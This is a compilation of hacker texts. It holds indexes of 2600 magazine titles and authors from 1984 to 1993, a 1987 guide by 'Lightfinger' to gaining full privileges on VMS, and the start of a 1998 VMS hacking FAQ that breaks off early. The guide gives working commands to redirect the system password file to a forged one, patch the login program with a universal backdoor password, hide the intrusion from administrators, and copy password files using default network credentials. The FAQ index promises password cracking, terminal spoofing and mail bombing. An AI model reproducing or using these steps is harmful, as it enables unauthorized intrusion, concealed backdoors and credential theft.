SEIZED! 2600 Bulletin Board is  
Implicated in Raid on Jersey Hackers    2(8):49  
Sherwood Forest Shut Down by  
  Secret Service                        2(6):34  
Shopper's Guide to COCOTS               9(3):13  
Shower Phone?~                          3(5):35  
"Signature" On Video Transmitters~      3(9):67  
Silver Box Born in U.K.                 7(1):19  
Silver Pages~                           2(4):21  
Simplex Locks                           8(3):6  
Simplex Update and Corrections          8(4):21  
Social Interaction with Phones          4(12):17  
Software Makers Crash BBS~              3(10):79  
Some Cosmos Documentation That May Be  
  Useful                                4(2):6  
Some Facts on Supervision               3(9):65  
Some Numbers                            4(12):21  
Some Thoughts on "Garbage Picking"      1(2):10  
Some Words on Hacker Morality           2(6):34  
South African BBS's                     4(10):11  
Soviet BBS List                         8(1):16  
Soviet Computer Update~                 3(3):23  
Soviets Denied Computer Access~         3(3):19  
Spanish Phones--and what they don't do  6(2):36  
Springsteen Mania~                      2(11):75  
Sprint Unites with US Telcom~           3(2):15  
Sprint--Too Many Customers~             3(11):87  
SS Number Returned to Citizens~         3(7):51  
Still More on the World of COSMOS       4(3):10  
Sting Boards on the Rise~               3(5):39  
Stock Market Crash~                     3(6):47  
Students Bog Down Computer~             1(12):69  
Students Cause Havoc on Computer~       1(3):3  
Stuff You Should Be Interested In~      8(4):8  
Stumbling into Control on a VMS         4(1):6  
Super Crisis Alert System~              2(12):87  
Super Pay Phone~                        2(12):87  
Supercomputer Dialups~                  1(3):3  
Survey Results                          2(12):84  
Surveying the COSMOS                    2(2):8  
TAP: The Legend is Dead                 4(1):4  
TASS News Service~                      3(3):23  
Technology Nabs Hooky Players~          3(1):3  
Teelco Rats On Government~              2(10):67  
Teenagers Abuse "Party Line~"           3(2):11  
Telco News                              9(4):42  
Telco Offices                           10(2):36  
Telco Response                          4(10):6  
Telco Sasys "Pay for Tones"~            3(12):91  
Telco Service Spawns Racist Banter~     2(12):83  
Telenet Addresses                       4(5):10  
Telenet Directory                       2(9):61  
Telenet Letter                          4(8):16  
Telephone Company Responds to Criticism  
  of Touch-tone Fees                    4(10):7  
Teller Machine Crime Coming~            1(4):3  
Test Numbers                            2(11):77  
Thai Phone Books a Hot Issue~           2(6):39  
The 516 Area Code in Detail             5(3):14  
The 707 Area Code                       7(1):44  
The Australian Phone System             9(1):31  
The Ballad of Captain Crunch            4(3):4  
The Basics: Divestiture: What Happened? 3(1):1  
The Class Struggle                      8(2):22  
The Cold Truth                          4(8):20  
The Computel Scoop                      3(5):34  
The Constitution of a Hacker            1(3):1  
The Dark Side of the Great Break-Up     1(6):4  
The Dark Side of Viruses                5(2):8  
The Day the Phone System REALLY Died    6(4):4  
The Death of COSMOS?                    6(3):13  
The Definitive ANAC Guide               7(3):39  
The Early Phreak Days                   2(11):80  
The Facts on 10698                      7(1):30  
The First 100% ESS State~               2(7):47  
The First Atomic Bomb                   1(3):4  
The Free Phones of Philly               3(7):50  
The Galactic Hacker Party               6(3):10  
The Ghost in the Machine~               3(8):59  
The Hacker "Threat"                     9(4):19  
The Hacker Video                        8(3):14  
The Hackers Guide to Area Code          1(8):47  
The History of ESS                      2(11):74  
The Infinity Transmitter--An Old Bug  
  that Had Its Time                     2(9):58  
The Latest~                             9(1):42  
The Magical Tone Box                    10(4):22  
The Neidorf/Phrack Trial: Day by Day    7(2):4  
The New "TAP"                           6(2):43  
The New LEC Order: Acronym City         8(1):42  
The Next Step in Custom Calling~        2(3):15  
The Person Numbers~                     1(3):3  
The Rise of the Computer State by David  
  Burnham Book Review                   1(8):44  
The Scariest Number in the World        1(12):68  
The Scoop on 911                        7(1):37  
The Scoop on Pen Registers~             3(2):11  
The Secrets of Mizar                    7(1):8  
The Simple Pleasures of a Step Office   1(5):1  
The Sprint Gestapo Strikes Again!       6(2):34  
The Summer Games of 87                  4(8):3  
The Telecom Informer                    4(10):8  
The Telecom Informer                    4(8):8  
The Telecom Informer                    4(9):8  
The Telecom Informer                    4(6):8  
The Telecom Informer                    4(5):8  
The Telecom Informer                    4(11):8  
The Telecom Informer                    4(4):8  
The Telecom Informer                    4(1):8  
The Telecom Informer                    4(12):8  
The Telecom Informer                    4(3):8  
The Telecom Informer                    4(2):8  
The Telecom Informer                    4(7):8  
The Terminus of Len Rose                8(1):11  
The Theory of 'Blue Boxing': their  
  history, how their used, their future 2(2):7  
The Trouble With Telemail               1(4):2  
The Truth Behind Those 9999 Numbers     1(1):4  
The View of A Fed                       9(2):38  
The Woes of Having a Small-Time Rural  
  Phone Company                         1(5):4  
The Word On the Street~                 7(4):36  
There are More Phones than Ever         3(3):23  
This Month At 2600                      3(4):30  
This Month at 2600                      3(3):22  
This Month's Mischief and Mayhem~       2(2):9  
This Month's Troublemakers~             2(3):15  
Those Horrible Hackers Strike Again     2(1):1  
Those Silly Codes                       4(10):14  
Tidbits~                                8(3):31  
Times Changing For Directory Assistance~1(2):9  
TINA Message Service~                   2(6):39  
Tips On Trashing                        6(2):32  
Toll Fraud Detection Techniques         7(1):12  
Toll Fraud Device                       10(2):42  
Toll Fraud: What the Big Boys are  
  Nervous About                         9(3):43  
Town on Hold During Strike~             3(7):51  
Trashing Alaska Style                   2(2):8  
Trashing: America's Source For  
  Information                           3(10):73  
Trick of the Month~                     1(2):9  
Trouble in the White House              10(1):12  
Trouble with 800 "Word Numbers"~        2(9):59  
True Colors                             10(3):9  
TRW Breached by Non-Hackers~            2(2):9  
TRW Credentials Lack Credibility        4(8):4  
TRW: Big Business is Watching You       1(7):5  
TV Blue Boxes~                          3(8):63  
Two Inch Thick Bill~                    2(10):67  
U. S. Secret Service Field Offices      9(4):12  
U.S. Phone Companies Face Built-In  
  Privacy Hole                          8(4):42  
UAPC Update                             6(4):45  
UNIX Password Hacker                    8(1):31  
UNIX Password Hacker: An Alternative  
  Approach                              9(1):18  
US and France Link Phones~              3(5):35  
US Social Security Prefixes             4(11):6  
Use of Wiretaps at Record Pace~         1(11):63  
Useful UNIX Programs                    8(3):44  
Using the Telephone                     9(3):36  
USPS Hacking                            8(3):32  
USPS Hacking Corrections                8(4):21  
USSR Computer Hungry~                   3(8):63  
Vehicle Identification Numbers          9(4):11  
Victimized by Crime Computers~          1(10):57  
Victory for Wiretap Victims~            1(5):3  
Video Review: Assorted Videos           10(2):40  
Video Telephone Invention~              1(12):69  
Violating A VAX                         3(7):49  
Virus Scanners Exposed                  9(1):9  
Vital Ingredients: Switching Centers  
  and Operators                         1(10):56  
VM/CMS Corrections                      5(1):8  
VMS--The Series Continues               3(2):9  
Voice Mail Hacking                      9(2):42  
Voice Mail Hacking...NYNEX Style        6(3):36  
Voice of Reagan Tortures Patients~      3(11):83  
War Game Addict~                        2(9):59  
Weathertrak Codes                       5(1):15  
What a White Box Can Do                 2(4):19  
What in the EFF?                        7(2):10  
What it's Like to be a Soviet Operator  5(4):30  
What's Going On With Phones/Computers   5(3):10  
Whats up~                               8(1):19  
When Hackers Ride Horses: A Review of  
  Cyberpunk                             8(2):42  
Where Have All the Hackers Gone?        8(2):4  
Where One Hacker Went (L)               8(3):24  
Whitehouse Extension Numbers            1(1):5  
Who Called the Shuttle?~                3(3):19  
Who the Hell was Almon Strowger, Anyway?5(3):9  
Who Wants to be Swept?~                 3(12):95  
Whoops [errata for 4(9)]                4(10):18  
Whose Strike Was That Anyway?           1(4):1  
Why Computers Get Snatched              2(8):54  
Why Won't They Listen?                  8(3):4  
Wireless Phones Spell Trouble~          1(1):3  
Wiretap City~                           1(3):3  
Wiretap Clarification (L)               7(3):30  
Wiretapping and Divestiture: A Lineman  
  Speaks Out                            2(1):1  
Word Numbers                            4(4):15  
Worldnet: Getting Closer Every Day      4(9):4  
WORM                                    6(2):38  
Wrath of God Strikes 2600               3(11):86  
Wrestlemania Pins Bell~                 3(5):39  
Write Protect Tabs Wrong~               3(2):15  
Yellow Scam~                            2(5):27  
"You Must First Dial a One..."~         1(7):7  
Your Own Private Centrex~               3(1):7 

2600 THE HACKER QUARTERLY 
Author Index: Volume 1 (1984) - Volume 10 (1993)
David Price

Authors are listed in the first column, titles and citations are
listed in the second column using the following format: 
V(N):P  V = Volume, N = Number, P = Page

910                        Elementary Switching  10(4):9
999, The                   High School Hacking  10(2):13
Abuse, Dr.                 Magnetic Strips  8(2):7
Advocate, The Devil's      Product Review: Do It Yourself Demon Dialer           
                            Kit  9(2):15
Advocate, The Devil's      Review: The Hacker Crackdown  9(3)21
Advocate, The Devil's      Review: Hacker: The Computer Crime Card Game          
                            9(1):36
Advocate, The Devil's      When Hackers Ride Horses: A Review of                 
                            Cyberpunk   8(2):42
Advocate, The Devil's      USPS Hacking  8(3):32
Agent 003, Boic            Hacking Packard  2(3):20
Agent 04, Phucked          Outside Loop Distribution Plant, or Hands-On
                            Experience  5(3):4
Agranoff, Mike             The Ballad of Captain Crunch  4(3):4
America, Mainstream        More VAX Tricks  4(5):4
Anonymous                  ANALYSIS: Gulf War Printer Virus  8(4):39
Anonymous                  Death of NYNEX Business Centers  8(2):11
Aristotle                  Voice Mail Hacking...NYNEX Style  6(3):36
B/Square & Mr. Upsetter    Building a DTMF Decoder  7(1):14
Baalzebub                  Violating A VAX  3(7):49
Bard, The                  High School Mac Hack  10(4):15
Bayonet                    Getting Your File...  10(1):42
Benedict, W. Ritchie       Book Review: The Devouring Fungus  9(2):40
Benedict, W. Ritchie       Book Review: Virtual Reality  10(4):37
Billsf                     True Colors  10(3):9
Billsf                     Hitchhiker Guide to the Phone System
                           Phreaking in the Nineties  9(2):10
Bluebox, Mark              The Truth Behind Those 9999 Numbers  1(1):4
Bootleg                    Cellular Magic  10(1):4
Bruce, Peter               Spanish Phones--and what they don't do                
                            6(2):36
Buggy, Orson               Banking from your Terminal--A Look at                 
                            PRONTO  2(7):42
Caller, Midnight           The Australian Phone System  9(1):31
Capone, Al                 Hacking on the Front Line  9(3):31
Catalyst, Cheshire         Hacking PC Pursuit  4(4):6
Catalyst, Cheshire         TAP: The Legend is Dead  4(1):4
Check, Parity              Meeting Advice  10(2):16
City, New Hack             The New LEC Order: Acronym City  8(1):42
Clayton, Noah              Converting a Tone Dialer into a Red Box         
                            7(3):32
Crazed Luddite & 
 Murdering Thug K001/Ra    An Algorithm for Credit Cards  7(3):42
Cruise-CTRL                An Overview of DSS1  10(3):36
DC                         More Conversion Tricks  8(3):43
Delam, Dr.                 Virus Scanners Exposed  9(1):9
Delam, Dr.                 Defeating Callback Verification  9(3):9
Dobbs, J.R. "Bob"          Building a Red Box  5(2):13
Dragon, The                Trashing: America's Source For Information            
                            3(10):73
Drake, John                England's Mass Announcements  4(9):10
Drake, John                A Trip to England  3(8):58
Drake, John                Book Review Nothing New in Computer                   
                            Underground by M. Harry  3(6):42
Drake, John                An Interview with Hugo Cornwall: British              
                            Hacker/Author  4(2):4
Drake, John                An Interview With the Chaos Computer Club
                            5(4):34
Drewl/Salivate             Changing Your Grades on A High School
                            Computer  10(3):34
Dust                       Crypt() Source Code  8(4):11
Dutton, Roland             Book Review: "The Hacker's Handbook"
                            4(2):15
Echo                       Acronyms A-G  10(1):34
Echo                       Acronyms H-R  10(2):20
Echo                       Acronyms S-X (no y or z)  10(3):44
Esper                      Mobile Frequencies  8(4):18
Estev, Paul G.             People Express to be Hacked to Pieces
                            2(5):25
Estev, Paul                Reviews: The 1989 Pirate Directory 6(2):42
Eye, Roving                Birth of a Low Technology Hacker  8(4):16
Eye, Roving                Growth of a Low Tech Hacker  9(4):17
Fed, The                   The View of A Fed  9(2):38
Fellpe Rodriquez &         
Rop, Gonggrijp             Stuff You Should Be Interested In~ 8(4):8
Firemonger                 Surveying the COSMOS  2(2):8
Foley Dan                  The Telecom Informer  4(6):8
Foley Dan                  The Telecom Informer  4(3):8
Foley Dan                  The Telecom Informer  4(4):8
Foley Dan                  The Telecom Informer  4(2):8
Foley Dan                  The Telecom Informer  4(1):8
Freeman, John              The Telecom Informer  4(5):8
Fresco, Al                 The Telecom Informer  4(9):8
Frosty of the GCMS         Fascinating fone fun  9(1):45
Frosty of the GCMS         A Batch Virus  9(1):8
FyberLyte                  The Magical Tone Box  10(4):22
G.R.A.S.P., Crisp          A Guide to the 5ESS  10(2):4
Galaxy, Mister             ANSI Bomb  10(2):44
Gam, Tamlyn                Silver Box Born in U.K.  7(1):19
Gamma, Bob                 Are You a Phreak???  2(3):13
Gerard, Judas              More Cellular Fun  10(3):42
Glitch, The                Cellular Update  5(3):8
Goldstein                  The Telecom Informer  4(7):8
Goldstein, Emmanuel        A Pen Register For Phreaks?: Product
                            Review--Dialed Number Recorder 4(5):22
Goldstein                  The Telecom Informer  4(10):8
Goldstein                  The Telecom Informer  4(8):8
Goldstein, Emmanuel        "FBI Revealed: Reviews--"The FBI Project 
                            Newsletter" & "The FBI and Your BBS" 4(8):9
Goldstein, Emmanuel        Never Erase the Past  10(3):19
Goldstein, Emmanuel        Review: Sneakers  9(3):17
Goldstein, Emmanuel        The Scoop on 911  7(1):37
Goldstein, Emmanuel        The New "TAP"  6(2):43
Goldstein, Emmanuel        Video Review: Assorted Videos  10(2):40
Goldstein, Emmanuel        New Revelations From Bell South  7(3):16
Grapefruit, Rancid         A Reader's Reply to Captain Zap  5(2):16
Gray, Jeff                 WORM  6(2):38
Greek, The                 International NUA's  4(10):10
Greek, The                 South African BBS's  4(10):11
Greenberg, Ross M.         A Form of Protection For You and Your
                            Computer  5(2):4
Guru, VM                   VM/CMS Corrections  5(1):8
Guy, The GCI               Trashing Alaska Style  2(2):8
Hackers, Legion of         Telenet Addresses  4(5):10
Hank@Taunivm.Bitnet        Worldnet: Getting Closer Every Day  4(9):4
Hibbert, Chris             Protecting Your SSN  8(3):18
Hobbit, The                Getting the Most Out of Equal Access  4(3):6
Holmes, Chester            An American Express Phone Story  3(3):17
Holmes, Chester            The Free Phones of Philly  3(7):50
Howard                     The Infinity Transmitter--An Old Bug that
                            Had Its Time  2(9):58
Icom, Mr.                  A Review of "The 'Top Secret' Registry of US
                            Government Radio Frequencies"  4(11):7
Inconnu, Les               Product Review: TDD-8 DTMF Decoder 10(2):14
Infidel, The               How Payphones Really Work  6(1):30
Infidel, The               REMOBS  6(3):32
Infidel, The               UNIX Password Hacker  8(1):31
Infidel, The               Exchange List: 201 Area Code  6(2):20
Infiltrator                A Simple Virus in C  9(3):19
Jaffee, Walter S.          Hacking Computer Shows  10(4):16
Jockey, Disk               US Social Security Prefixes  4(11):6
Jockey, Keyboard           UNIX Password Hacker: An Alternative
                            Approach  9(1):18
Judicator of D.C.          More Meeting Advice  10(4):35
Kevin                      Internet Outdials  8(1):40
Kid, the & Co.             How to Get into a C.O.  2(3):14
Kid, the & Co.             Knowing UNIX  3(8):57
Kid, The & Co.             Some Facts on Supervision  3(9):65
Kingpin, 617 & 
 RDT Syndicate             Cellular Phone Biopsy  10(4):6
Knight, Red                More On Hacking UNIX  6(4):4
Knight, The Dark           British News  10(1):44
Knight, Red                A Hacker's Guide to UNIX  5(4):12
Kurtz, Colonel Walter E.   Class Features  8(4):31
Lineman, The               Phoning Home From Europe  4(5):9
Lurch, The                 707 Area Code  7(1):44
Luthor, Lex                The History of ESS  2(11):74
Luthor, Lex                Telenet Directory  2(9):61
Luthor, Lex & The LOD      History of British Phreaking  1(9):49
Luthor, Lex                Where One Hacker Went (L)  8(3):24
Luthor, Lex  & The LOD     Fun With COSMOS  2(12):82
Luthor, Lex  & the LOD     More Info on VMS  2(10):66
Luthor, Lex  & The Legion 
 of Hackers                Hacking IBM's VM/CMS--Part Two  4(12):4
Luthor, Lex  & The LOD     Final Words on VMS  3(3):18
Luthor, Lex  & The LOD     A Guide to VMS  2(9):57
Luthor, Lex  & The Legion
 of Hackers                Hacking IBM's VM/CMS  4(11):4
Luthor, Lex  & The Legion 
 of Doom/Hackers           VMS--The Series Continues  3(2):9
Mac+                       New York's IMAS  4(10):4
MAD!                       Death of a Pay Phone  3(10):73
Man, Swinging              Hacking AmiExpress  9(3):4
Marauder, The              RSTS For Beginners  3(4):25
Marauder, The              & The L.O.D. A HAcker's Guide to the TSPS
                            Console  4(6):6
Marauder, The &            
Phoneline Phantoms         RSTS: A Trick Or Two  2(11):73
Master, LNA                Listening In: Catch Me if you Can!  4(11):7
MechWariors, GCMS          U. S. Secret Service Field Offices  9(4):12
Menace, Hyperborean        Caller ID Technologies  10(3):12
Meyer, Gordon & Jim Thomas The Neidorf/Phrack Trial: Day by Day                  
                            7(2):4
Micro Surgeon /West Coast 
 Phreaks                   Punching Pay Phones  6(3):37
Mitnick, Kevin             Pure Cyberfiction, Says Mitnick  8(2):42
Mitnick, Kevin             Looking Up IBM Passwords  8(1):36
Mole, The                  Stumbling into Control on a VMS  4(1):6
Monk, The                  How to Take Apart A Payphone  9(1):20
Moon, Electric             A True Saga of Teleconferencing  1(4):4
Mouse, MCI                 Hacking MCIMAX  8(2):16
Murphy, Dan                Review: CO Magazine  4(9):22
Nathan, Paco Xander        Secret Service on Trial  10(1):18
Neidorf, Craig             An Appeal For Help  8(4):36
Neidorf, Craig             The Terminus of Len Rose  8(1):11
NeurAlien                  Beginner's Guide to Minitel  9(4):8
Overlord, Dark             Lair of the INTERNET Worm  6(3):39
P., Larry                  The Sprint Gestapo Strikes Again!  6(2):34
Page, Bob                  A Report on the Internet Worm  5(4):4
Panda, Paranoid            In Pursuit of Knowledge: An Atari 520ST
                            Virus  8(1):4
Panda, Paranoid            An MS-DOS Virus  9(1):4
Phoenix, The               Beige Box Construction  10(1):14
Phorester, Dr. Clayton     Descrambling Cable  10(1):16
Phreak, Nynex              Numbers of Interest  4(8):6
Phreak, The Alaskan        (TAP)  Exploits in Operator Hell  3(5):33
Phreaker, Lord             Book Review: "Automatic Teller Machines III"
                            4(2):21
Phreaker, Cray-Z           Product Review: Speech Thing  9(4):45
Phreaker, Lord             An Interesting Diversion  2(10):65
Phreaker, Phantom &        
Doom Prophet & LOD!        Toll Fraud Detection Techniques  7(1):12
Plague, The                The Dark Side of Viruses  5(2):8
Plague, The                Grade "A" Hacking  6(3):4
Plague, The                NYNEX Data   6(4):9
Plague, The                UAPC Update  6(4):45
Plague, The                An Introduction to COCOTS  7(2):20
Plann, Marshall            Useful UNIX Programs  8(3):44
Prefect, Phord             Getting Started  9(3):42
PW                         Human Database Centers  8(4):46
"Q", The                   The Secrets of Mizar  7(1):8
Rabbit, Peter              Cipher Fun  9(4):6
Ranger, Night              Voice Mail Hacking  9(2):42
Ranger, Forest             Reaching Out On Your Own  2(9):58
Rat, Tech                  Hacking Smartphone  10(4):11
Rebel                      Know Your Switch  10(4):10
Reisman, Bruce             Telephone Company Responds to Criticism of
                            Touch-tone Fees  4(10):7
Researcher, The            Mobile Phones--Theory and Construction
                            3(4):26
Resz, Stepher J.           Book Review: Approaching Zero  10(3):38
RNOC, Bill From Legion 
 of Doom                   Still More on the World of COSMOS 4(3):10
Rocker, The Veteran Cosmic Saudi Arabian BBS List  4(7):21
Rome, Hal from             Roman Hackers  4(12):18
Runner, Net                Outdials  8(2):44
S., Bernie                 How the Defeat *69  9(2):31
S., Bernie                 AT&T Sub Maps  4(8):11
S., Bernie                 FAX: A New Hobby  4(5):14
S., Bernie                 Paging For Free  4(6):5
S., Bernie                 Cellular Phone Fraud and Where It's Headed
                            4(7):4
S., Bernie                 Secret Frequencies  8(2):32
Salerno, Mike              Getting In The Back Door: A Guide to Some
                            Popular Operating Systems  2(1):2
Scannon, Lou               Book Review: Tune in on Telephone Calls by
                            Tom Kneitel  5(4):45
Scientist, Mad             How to Use Your Silver Box  9(1):16
Severence, No              How Phone Phreaks are Caught  4(7):6
Shadow, The Knights of     Interesting Things to do on a DEC-20
                            2(7):41
Shadow, The                Wiretapping and Divestiture: A Lineman
                            Speaks Out  2(1):1
Shadow, The                How to Run a Successful Teleconference
                            2(5):26
Shadow, The                Test Numbers  2(11):77
Shadow, The                "Equal Access May Not be ""Equal"" to Modems"
                            2(11):74
Skinner, Scott             One Angry Judge  10(1):23
Skinner, Scott &    
 Emmanuel Goldstein        Simplex Locks  8(3):6
Solomenko, E.              What it's Like to be a Soviet Operator 5(4):30
Source, U. R,              How to Hack Honesty  10(3):20
Staff                      The Telecom Informer  4(11):8
Statton, Scott             Ever Wonder Who Owns All Those 800 Numbers?
                            6(1):12
Steal, Agent               Central Office Operations  7(4):12
Strowger, Almon, Jr.       Who the Hell was Almon Strowger, Anyway?
                            5(3):9
Switchman, Silent          And They Call US Crooks?  2(10):65
Switchman, Silent          Here's the Secret!  2(11):73
Taylor, Dave               Social Interaction with Phones  4(12):17
TELEgodzilla               Our Contest Winners  7(4):32
The Kid & Co. &     
The Shadow                 More on Trashing: What to Look for, How to
                            Act, Where to Go.  1(9):50
"The Snake", Jake          Caller ID: The Facts  7(3):5
Thunder, Lord              Defeating Trap Tracing  7(3):22
Toad, Texas                Capturing Passwords  4(8):10
Tommy                      BASIC Red Box Tones  5(3):22
Tommy                      Canadian WATS Phonebook  5(3):23
Upsetter, Mr.              Build A Tone Tracer  8(2):14
Upsetter, Mr.              Listening In  7(1):19
Upsetter, Mr.              Scanning For Calls  6(2):22
Upsetter, Mr.              How to Build a Silver Box  6(4):20
Valve, Rex                 TRW Credentials Lack Credibility  4(8):4
Velcro, Romula             Meeting Advice  10(2):17
Videosmith, The            CLASS: What It Means To Us  4(5):6
Violence                   A Guide to PRIMOS  6(2):4
Violence                   PRIMOS: The Final Part  7(2):14
Violence                   More Hacking on Primos  6(4):14
William, Sir               Some Cosmos Documentation That May Be
                            Useful  4(2):6
Williams, Dr.              Tips On Trashing  6(2):32
Williams, Dr.              Hardwiring Your Way In  5(4):42
Williams, Dr.              An Interview with Dorothy Denning  7(3):10
Williams, Dr.              Book Review: The Cuckoo's Egg  7(1):45
Williams, Dr.              A Study of Hackers  10(1):38
Wintermute                 Operating With Difficulty  4(9):6
Wood, Jim                  The Early Phreak Days  2(11):80
Woodstein, Condor          Psychology in the Hacker World  8(3):38
X, Alien                   A Way To Catch Peepers  9(1):35
Yuhas, Mike                Allnet: A Horror Story  4(6):4
Zap, Captain               An Interpretation of Computer Hacking 5(1):16
Zee, Charlie               Trouble in the White House  10(1):12
Zero, Count                Toll Fraud: What the Big Boys are Nervous
                            About  9(3):43
Zero, Count                Shopper's Guide to COCOTS  9(3):13

Getting System Privilege under VMS by Lightfinger (1987)

1.  To get SYSNAM privilege under V4.2 do the following:-

$ SET ACL/OBJ=LOGICAL/ACL=(ID=[???,???],ACCESS=READ+WRITE+DELETE+CONTROL)
      LNM$SYSTEM_TABLE

etc. on all there tables that you need access to.  The problem with VMS is
that it allows ACLs on logical name tables, but anyone can put them on!
[???,???] is your UIC.

 Or if you have another method of gaining SYSNAM priv you can do the 
following..

Now that you have this ACL, you should be able to add an entry for SYSUAF,
you need the executor mode name, eg:

$ DEFINE/SYSTEM/EXEC SYSUAF $1$DISK1:[FRED]SYSUAF

If you have done a SET DEFAULT to [FRED] before hand and done this:

$ COPY SYS$SYSTEM:SYSUAF.DAT *

then you should be able to do:

$ RUN SYS$SYSTEM:AUTHORIZE

UAF>ADD FRED/PASS=FRED/PRIV=ALL/FLAG=NODISUSER

UAF>^Z

*EXIT*

 You should now note that ANYONE logging onto the system will be checked
against the SYSUAF file in the [FRED] directory and NOT the SYS$SYSTEM 
directory.. also anyone doing a SHOW LOGICAL will see a new entry in the 
system name table.. ie. "SYSUAF" = SYS$SYSDEVICE:[FRED]SYSUAF

Its now all ready to test..
Try:

$ SET HOST 0

Username: FRED
Password: FRED

And hey presto.. your logged in with FULL privileges..

As entering an entry into the System logical table is a bit of a mass 
giveaway of who is hacking the system it is a good idea to copy the sysuaf
file from the system direcxtory, and ALTERING your OWN account to have
full privs, doing this doesnt cause suspicsion if a new USERNAME appears.

So write a DCL command procedure that will:
A. Get SYSNAM priv
B. Enter the new logical name into the system table
C. Login

and write a routine that is called from your login.com file that does:

A. Checks for the SYSUAF entry in the system table
B. Deletes it if it is present.

Doing this will make the new definition for SYSUAF only appear for a fract-
ion of a second and will be very dificult to trace..

You should now be logged into your own account with FULL privs.. magic
really.. (I have tested this method and it works really well!)

2.   Another approach (or extension to the last method) by  getting  write
     access to LOGINOUT.EXE in SYS$SYSTEM is the following patch:

$SET DEFAULT SYS$SYSTEM:
$PATCH LOGINOUT

PATCH>REPALCE/INSTRUCTION 9D14

OLD>'MOVAB B^20(SP),B^1C(SP)'
OLD>EXIT
NEW>'CMPL B^20(SP),#41414141'
NEW>'BNEQ LBL'
NEW>'MOVL I^#1,R0'
NEW>'RET'
NEW>'LBL: MOVAB B^20(SP),B^1C(SP)'
NEW>EXIT
PATCH>UPDATE

$ INSTALL/REPLACE LOGINOUT.EXE
$ PURGE LOGINOUT.EXE

Then try logging in:

Username: SYSTEM
Password: AAAA

or

Username: ANY_ONE_WHO_EXISTS_ON_THIS_SYSTEM
Password: AAAA

This works for V4.2 and V4.3, probably V4.1 as well, check if the MOVAB is
at 9D14 with EXAMIN/INSTRUCTION.

3. On most machines you will find the following also works, (useful for 
   accessing protected files..)

  To say copy the SYSUAF.DAT file to your own directory try:

 $ COPY NODE"DECNET DECNET"::SYS$SYSTEM:SYSUAF.DAT *.*

 Where NODE is your local node name (machine name, can be found by doing
 SHOW NETWORK, the current node is the top one in the list)
 If the above doesnt work then try removing the second DECNET within the 
 quotes.
 The two words within the quotes are firstly the username and secondly the
 password of an account that has NETWORK access, DECNET is likely to have
 full access on most machines.

          These hacks are copyright of Lightfinger.     (c) 1987

The VMS Hacking FAQ (Beta 0.03 Release) July 20th, 1998 by The Beave and Tsywt

	Heres one to add to your "uploads".  I still try to keep
up with it,  but with my old MVII (or any VMS box) it's been hard. 
Anyways,  thats about to change.   

----< Snip >------------------------------------------------------

		- VMS HACK FAQ (Frequently Ask Questions) -

			  - Beta 0.03 Release -
			     July 20th,  1998

	        Originally by The Beave (beave@vistech.net)
	     	Extra Contributions Add By Tsywt  

                http://www.vistech.net/users/beave/hack-vms-faq

Introduction:

	This article contain the answers to some frequently asked question
	(Hence,  the name FAQ) about hacking the VMS operating system. 

	"Why a VMS Hacking FAQ?"

	Several reasons.    Once and a while,   A escape from Unix is
	very,  very nice.   Another reason is that is art of 
	VMS hacking has since vanished,  and its replacement are
	statements like,  "Hacking VMS is impossible", "VMS is
	to cryptic to use",  and as always,  "Man,  VMS sucks". 

	These are generally statements by people who know almost 
	zero about VMS.   I don't want to go into a "which OS is
	better",  because that would defeat the purpose of this 
	file,  but in my personal opinion,   both OS's have 
	there advantages/disadvantages. 

	I have,  however,  written this FAQ with a Unix overtone
	to it,  to help the reader understand what is trying to
	be accomplished in some examples. 

	The article may be freely redistributed in its entirety provide
	that credits are not altered or removed.   It may not be 
	sold for profit or incorporated in commercial documents without
	the written permission of the author(s). 

	This is the beta release of this article,   which means,  
	the article is still in the working,  and is not complete. 

	Submissions,  corrections,  comments,  input,  complaints, 
	bomb threats,   cash,  etc.,  should be directed toward
	the alt.2600 newsgroup or beave@vistech.net.  

 	If you make additions to the text,  please let me know.

Index ---:

More Common Newbie Questions:

1.  VMS Basic information ("What does VMS run on?")
2.  Identifying OpenVMS/VMS systems.  ("Is it a VMS box?")
3.  Password storage information (SYSUAF.DAT) ("Where the hell is the 
    /etc/passwd file??!?!?!")
4.  User storage information (RIGHTSLIST.DAT)
5.  Cracking the SYSUAF.DAT ("Is there a version of 'Crack' for VMS
    machines?")
6.  Becoming invisible in VMS ("Is there a 'Cloak' routine in VMS?")
7.  SET DEFAULT command ("How the do I change damn directory's?")
8.  The infamous "CD" .COM file ("I hate this SET DEFAULT crap") 
9.  LOGIN.COM ("Okay,  where's my .profile???").
10.  Captive Accounts ("I can't get to DCL"). 
11. Terminal Spoofing ("How can I passively gather passwords at a terminal?")
12. User Impersonation ("Can I masquerade as another user?")
13. Accounting/Auditing ("Who's watching me?")

VMS Mail Hack Routines:

1.  Unix/VMS Sendmail holes ("Will my sendmail holes work on VMS?")
2.  Mail Bomb ("I need to mailbomb a user from my VMS account,  how?)

VMS Phone Hack Routines:

1.  Anonymous Phone Messages("How do I become a VAXPhone phreaker?")
2.  Phone Directories("How can I do a 'sh users' using the phone protocol?")

User/Image Privilege Information:

1.  Systems Privileges, Listing and explanation ("How are Priv's setup?")
2.  Creating privileged images ("Can I create a SUID Shell on a VMS box?")

DECNetwork Information.

1.  Brief Description of a DECNet ("What's a DECNet?")
2.  What it means to you ("What can it do for me?")
3.  Obtaining files/system info/etc ("How do I get information for the remote?")
4.  Using remote nodes ("How do I connect interactively?")
5.  Getting node lists ("How do I find connectable nodes?")
6.  Proxy Logins ("Can't DECNet nodes be protected?")
7.  Proxy Logs ("Are Proxy logins logged? Can I use it to break into nodes?") 
8.  Sneak Routing ("Can I get to a machine I normally couldn't through another
    machine?")

TCP/IP Connected VMS Machines. 

1.  Obtaining remote usernames without "FINGER" ("How do I get usernames
    if FINGER is disabled")
2.  Changing the image running in FINGER ("How do I link a command name to
    another so it appears I am running a different image?")
3.  The TCPDUMP sniffer

		-      More Common Newbie Questions      -

1.      "What does VMS run on?"

	VMS (Virtual Memory System) runs on Digital Equipment Corp. 
	(DEC - pronounced,  "DECK") VAX (Virtual Address eXtension)
	and the DEC Alpha's.   The user uses DCL (DEC Command
	Language) to interact with the computer.  These commands
	and there syntax are completely different then those of
	Unix and Unix-like operating systems,  thus a completely
	different mind-set is often required (this is the authors
	opinion). 

2.	Identifying OpenVMS/VMS systems ("Is it VMS box?")

	Identification of a possible VMS system can usually be 
	done at the "USERNAME:" prompt.  Sometimes the welcome 
	screen itself will reveal that its a VMS system (for 
	example, "Welcome to ABC Computer Under VMS 5.5-2"). 
	Lets assume that this is not the case.   There are still 
	some "checks" that you can perform.   One key is that 
	a invalid login attempt will give you a "User authorization
	failure" message.   This is a pretty good indication that
	the remote system is under VMS.  If your still not 
